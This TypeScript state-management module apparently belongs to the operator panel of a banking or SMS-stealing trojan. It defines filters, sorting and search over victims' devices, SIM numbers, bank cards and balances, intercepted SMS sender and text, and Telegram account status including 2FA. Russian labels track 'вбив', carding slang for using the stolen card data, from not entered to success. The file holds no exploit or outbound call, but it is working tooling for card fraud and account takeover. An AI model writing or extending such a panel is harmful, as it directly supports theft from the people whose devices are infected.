import { createEvent, createStore, sample } from 'effector';
import { $resetAuth } from './profile-entity';

export type OnlineStatusFilter = 'all' | 'online' | 'offline';
export type ClientsListType = 'clients' | 'balances' | 'cards' | 'phones';
export type TriFilter = 'all' | 'yes' | 'no';
export type SortDir = 'asc' | 'desc';

export type ClientsSearchField =
	| 'id'
	| 'buildId'
	| 'profileNickname'
	| 'sdkVersion'
	| 'phone'
	| 'phoneNumber'
	| 'cardNumber'
	| 'comment'
	| 'takenFrom';

export type BalancesSearchField = 'clientId' | 'buildId' | 'cardNumber' | 'sender' | 'text' | 'comment' | 'cardBalance';
export type CardsSearchField = 'cardNumber' | 'clientId' | 'buildId';
export type PhonesSearchField = 'number' | 'clientId' | 'buildId';

export type ClientsSortBy = 'createdAt' | 'onlineAt' | 'maxCardBalance';
export type BalancesSortBy = 'createdAt' | 'cardBalance';
export type CardsSortBy = 'createdAt' | 'cardNumber' | 'balance';
export type PhonesSortBy = 'createdAt' | 'number' | 'maxCardBalance';

export interface IClientsFilter {
	onlineStatus: OnlineStatusFilter;
	takeStatus: 'all' | 0 | 1 | 2 | 3;
	tgStatus: 'all' | 'notset' | 'used' | 'woutcode' | '2fa';
	launchStatus: 'all' | 0 | 1 | 2;
	hasPhone: TriFilter;
	removeRussianPhone: boolean;
	hasComment: TriFilter;
	hasCards: TriFilter;
	hasBalance: TriFilter;
}

export const defaultClientsFilter: IClientsFilter = {
	onlineStatus: 'online',
	takeStatus: 'all',
	tgStatus: 'all',
	launchStatus: 'all',
	hasPhone: 'all',
	removeRussianPhone: false,
	hasComment: 'all',
	hasCards: 'all',
	hasBalance: 'all',
};

export const $resetPanelState = createEvent();

export const $setClientsFilter = createEvent<IClientsFilter>();
export const $updateClientsFilter = createEvent<Partial<IClientsFilter>>();

export const $clientsFilter = createStore<IClientsFilter>(defaultClientsFilter)
	.on($setClientsFilter, (_, payload) => payload)
	.on($updateClientsFilter, (state, payload) => ({ ...state, ...payload }))
	.reset($resetPanelState);

export const $setClientsListType = createEvent<ClientsListType>();
export const $clientsListType = createStore<ClientsListType>('balances')
	.on($setClientsListType, (_, payload) => payload)
	.reset($resetPanelState);

export const $setClientsSearchText = createEvent<string>();
export const $clientsSearchText = createStore<string>('').on($setClientsSearchText, (_, payload) => payload).reset($resetPanelState);

export const $setClientsSearchField = createEvent<ClientsSearchField>();
export const $clientsSearchField = createStore<ClientsSearchField>('id')
	.on($setClientsSearchField, (_, payload) => payload)
	.reset($resetPanelState);

export const $setBalancesSearchField = createEvent<BalancesSearchField>();
export const $balancesSearchField = createStore<BalancesSearchField>('clientId')
	.on($setBalancesSearchField, (_, payload) => payload)
	.reset($resetPanelState);

export const $setCardsSearchField = createEvent<CardsSearchField>();
export const $cardsSearchField = createStore<CardsSearchField>('cardNumber')
	.on($setCardsSearchField, (_, payload) => payload)
	.reset($resetPanelState);

export const $setPhonesSearchField = createEvent<PhonesSearchField>();
export const $phonesSearchField = createStore<PhonesSearchField>('number')
	.on($setPhonesSearchField, (_, payload) => payload)
	.reset($resetPanelState);

export const $setClientsSortBy = createEvent<ClientsSortBy>();
export const $clientsSortBy = createStore<ClientsSortBy>('createdAt').on($setClientsSortBy, (_, payload) => payload).reset($resetPanelState);

export const $setBalancesSortBy = createEvent<BalancesSortBy>();
export const $balancesSortBy = createStore<BalancesSortBy>('createdAt').on($setBalancesSortBy, (_, payload) => payload).reset($resetPanelState);

export const $setCardsSortBy = createEvent<CardsSortBy>();
export const $cardsSortBy = createStore<CardsSortBy>('createdAt').on($setCardsSortBy, (_, payload) => payload).reset($resetPanelState);

export const $setPhonesSortBy = createEvent<PhonesSortBy>();
export const $phonesSortBy = createStore<PhonesSortBy>('createdAt').on($setPhonesSortBy, (_, payload) => payload).reset($resetPanelState);

export const $setClientsSortDir = createEvent<SortDir>();
export const $clientsSortDir = createStore<SortDir>('desc').on($setClientsSortDir, (_, payload) => payload).reset($resetPanelState);

export const $setClientsListScrollTop = createEvent<number>();
export const $clientsListScrollTop = createStore<number>(0).on($setClientsListScrollTop, (_, payload) => payload).reset($resetPanelState);

export const $setBalancesListScrollTop = createEvent<number>();
export const $balancesListScrollTop = createStore<number>(0).on($setBalancesListScrollTop, (_, payload) => payload).reset($resetPanelState);

export const $setCardsListScrollTop = createEvent<number>();
export const $cardsListScrollTop = createStore<number>(0).on($setCardsListScrollTop, (_, payload) => payload).reset($resetPanelState);

export const $setPhonesListScrollTop = createEvent<number>();
export const $phonesListScrollTop = createStore<number>(0).on($setPhonesListScrollTop, (_, payload) => payload).reset($resetPanelState);

export const $setClientsFetchKey = createEvent<string>();
export const $clientsFetchKey = createStore<string>('').on($setClientsFetchKey, (_, payload) => payload).reset($resetPanelState);

export const $setBalancesFetchKey = createEvent<string>();
export const $balancesFetchKey = createStore<string>('').on($setBalancesFetchKey, (_, payload) => payload).reset($resetPanelState);

export const $setCardsFetchKey = createEvent<string>();
export const $cardsFetchKey = createStore<string>('').on($setCardsFetchKey, (_, payload) => payload).reset($resetPanelState);

export const $setPhonesFetchKey = createEvent<string>();
export const $phonesFetchKey = createStore<string>('').on($setPhonesFetchKey, (_, payload) => payload).reset($resetPanelState);

sample({
	clock: $resetAuth,
	target: $resetPanelState,
});

sample({
	clock: $setClientsListType,
	fn: () => '',
	target: $setClientsSearchText,
});

export function onlineStatusToIsOnline(onlineStatus: OnlineStatusFilter): boolean | undefined {
	if (onlineStatus === 'online') return true;
	if (onlineStatus === 'offline') return false;
	return undefined;
}

export function countActiveClientsFilters(filter: IClientsFilter, schema: 'client' | 'balance' | 'card' | 'phone' = 'client'): number {
	let count = 0;
	if (filter.takeStatus !== 'all') count++;
	if (schema === 'client') {
		if (filter.tgStatus !== 'all') count++;
		if (filter.hasPhone !== 'all') count++;
		if (filter.removeRussianPhone) count++;
		if (filter.hasComment !== 'all') count++;
		if (filter.hasCards !== 'all') count++;
	}
	if (schema === 'balance') {
		if (filter.hasPhone !== 'all') count++;
	}
	if (schema === 'phone') {
		if (filter.removeRussianPhone) count++;
		if (filter.hasBalance !== 'all') count++;
		if (filter.hasCards !== 'all') count++;
	}
	if (schema === 'card') {
		if (filter.hasBalance !== 'all') count++;
		if (filter.hasPhone !== 'all') count++;
	}
	return count;
}

export type ActiveFilterChip = { key: keyof IClientsFilter; label: string };

export function getActiveFilterChips(filter: IClientsFilter, schema: 'client' | 'balance' | 'card' | 'phone'): ActiveFilterChip[] {
	const chips: ActiveFilterChip[] = [];
	const takeLabels: Record<number, string> = { 0: 'Не вбит', 1: 'На вбиве', 2: 'Успешно', 3: 'Говно' };
	const tgLabels: Record<string, string> = { notset: 'Не исп.', used: 'Использован', woutcode: 'Нет кода', '2fa': '2FA' };

	if (filter.takeStatus !== 'all') {
		chips.push({ key: 'takeStatus', label: `Вбив: ${takeLabels[filter.takeStatus]}` });
	}

	if (schema === 'client') {
		if (filter.tgStatus !== 'all') chips.push({ key: 'tgStatus', label: `TG: ${tgLabels[filter.tgStatus]}` });
		if (filter.hasPhone !== 'all') chips.push({ key: 'hasPhone', label: filter.hasPhone === 'yes' ? 'Есть телефон' : 'Без телефона' });
		if (filter.removeRussianPhone) chips.push({ key: 'removeRussianPhone', label: 'Без РФ' });
		if (filter.hasComment !== 'all') chips.push({ key: 'hasComment', label: filter.hasComment === 'yes' ? 'С коммент.' : 'Без коммент.' });
		if (filter.hasCards !== 'all') chips.push({ key: 'hasCards', label: filter.hasCards === 'yes' ? 'С картами' : 'Без карт' });
	}

	if (schema === 'balance') {
		if (filter.hasPhone !== 'all') chips.push({ key: 'hasPhone', label: filter.hasPhone === 'yes' ? 'Есть номера' : 'Без номеров' });
	}

	if (schema === 'phone') {
		if (filter.removeRussianPhone) chips.push({ key: 'removeRussianPhone', label: 'Без РФ' });
		if (filter.hasBalance !== 'all') chips.push({ key: 'hasBalance', label: filter.hasBalance === 'yes' ? 'С балансом' : 'Без баланса' });
		if (filter.hasCards !== 'all') chips.push({ key: 'hasCards', label: filter.hasCards === 'yes' ? 'С картами' : 'Без карт' });
	}

	if (schema === 'card') {
		if (filter.hasBalance !== 'all') chips.push({ key: 'hasBalance', label: filter.hasBalance === 'yes' ? 'С балансом' : 'Без баланса' });
		if (filter.hasPhone !== 'all') chips.push({ key: 'hasPhone', label: filter.hasPhone === 'yes' ? 'Есть номера' : 'Без номеров' });
	}

	return chips;
}

export function clearFilterKey(key: keyof IClientsFilter): Partial<IClientsFilter> {
	switch (key) {
		case 'takeStatus':
			return { takeStatus: 'all' };
		case 'tgStatus':
			return { tgStatus: 'all' };
		case 'launchStatus':
			return { launchStatus: 'all' };
		case 'hasPhone':
			return { hasPhone: 'all' };
		case 'removeRussianPhone':
			return { removeRussianPhone: false };
		case 'hasComment':
			return { hasComment: 'all' };
		case 'hasCards':
			return { hasCards: 'all' };
		case 'hasBalance':
			return { hasBalance: 'all' };
		default:
			return {};
	}
}

export function toServerClientsFilters(filter: IClientsFilter) {
	return {
		takeStatus: filter.takeStatus === 'all' ? undefined : filter.takeStatus,
		tgStatus: filter.tgStatus === 'all' ? undefined : filter.tgStatus,
		hasPhone: filter.hasPhone === 'all' ? undefined : filter.hasPhone,
		removeRussianPhone: filter.removeRussianPhone || undefined,
		hasComment: filter.hasComment === 'all' ? undefined : filter.hasComment,
		hasCards: filter.hasCards === 'all' ? undefined : filter.hasCards,
	};
}

export function toServerBalancesFilters(filter: IClientsFilter) {
	return {
		takeStatus: filter.takeStatus === 'all' ? undefined : filter.takeStatus,
		hasPhone: filter.hasPhone === 'all' ? undefined : filter.hasPhone,
	};
}

export function toServerPhonesFilters(filter: IClientsFilter) {
	return {
		takeStatus: filter.takeStatus === 'all' ? undefined : filter.takeStatus,
		removeRussianPhone: filter.removeRussianPhone || undefined,
		hasBalance: filter.hasBalance === 'all' ? undefined : filter.hasBalance,
		hasCards: filter.hasCards === 'all' ? undefined : filter.hasCards,
	};
}

export function toServerCardsFilters(filter: IClientsFilter) {
	return {
		takeStatus: filter.takeStatus === 'all' ? undefined : filter.takeStatus,
		hasBalance: filter.hasBalance === 'all' ? undefined : filter.hasBalance,
		hasPhone: filter.hasPhone === 'all' ? undefined : filter.hasPhone,
	};
}

export const CLIENTS_SEARCH_FIELD_OPTIONS: { value: ClientsSearchField; label: string }[] = [
	{ value: 'id', label: 'ID' },
	{ value: 'buildId', label: 'Билд' },
	{ value: 'profileNickname', label: 'Ник' },
	{ value: 'sdkVersion', label: 'SDK' },
	{ value: 'phone', label: 'Телефон (client)' },
	{ value: 'phoneNumber', label: 'Номер SIM' },
	{ value: 'cardNumber', label: 'Карта' },
	{ value: 'comment', label: 'Комментарий' },
	{ value: 'takenFrom', label: 'Взял' },
];

export const BALANCES_SEARCH_FIELD_OPTIONS: { value: BalancesSearchField; label: string }[] = [
	{ value: 'clientId', label: 'ID клиента' },
	{ value: 'buildId', label: 'Билд' },
	{ value: 'cardNumber', label: 'Карта' },
	{ value: 'sender', label: 'Отправитель' },
	{ value: 'text', label: 'Текст' },
	{ value: 'comment', label: 'Комментарий' },
	{ value: 'cardBalance', label: 'Баланс' },
];

export const CLIENTS_SORT_OPTIONS: { value: ClientsSortBy; label: string }[] = [
	{ value: 'createdAt', label: 'Создан' },
	{ value: 'onlineAt', label: 'Ласт пинг' },
	{ value: 'maxCardBalance', label: 'Баланс карт' },
];

export const BALANCES_SORT_OPTIONS: { value: BalancesSortBy; label: string }[] = [
	{ value: 'createdAt', label: 'Создан' },
	{ value: 'cardBalance', label: 'Баланс' },
];

export const CARDS_SEARCH_FIELD_OPTIONS: { value: CardsSearchField; label: string }[] = [
	{ value: 'cardNumber', label: 'Номер карты' },
	{ value: 'clientId', label: 'ID клиента' },
	{ value: 'buildId', label: 'Билд' },
];

export const CARDS_SORT_OPTIONS: { value: CardsSortBy; label: string }[] = [
	{ value: 'createdAt', label: 'Создан' },
	{ value: 'cardNumber', label: 'Номер' },
	{ value: 'balance', label: 'Баланс' },
];

export const PHONES_SEARCH_FIELD_OPTIONS: { value: PhonesSearchField; label: string }[] = [
	{ value: 'number', label: 'Номер' },
	{ value: 'clientId', label: 'ID клиента' },
	{ value: 'buildId', label: 'Билд' },
];

export const PHONES_SORT_OPTIONS: { value: PhonesSortBy; label: string }[] = [
	{ value: 'createdAt', label: 'Создан' },
	{ value: 'number', label: 'Номер' },
	{ value: 'maxCardBalance', label: 'Баланс карт' },
];
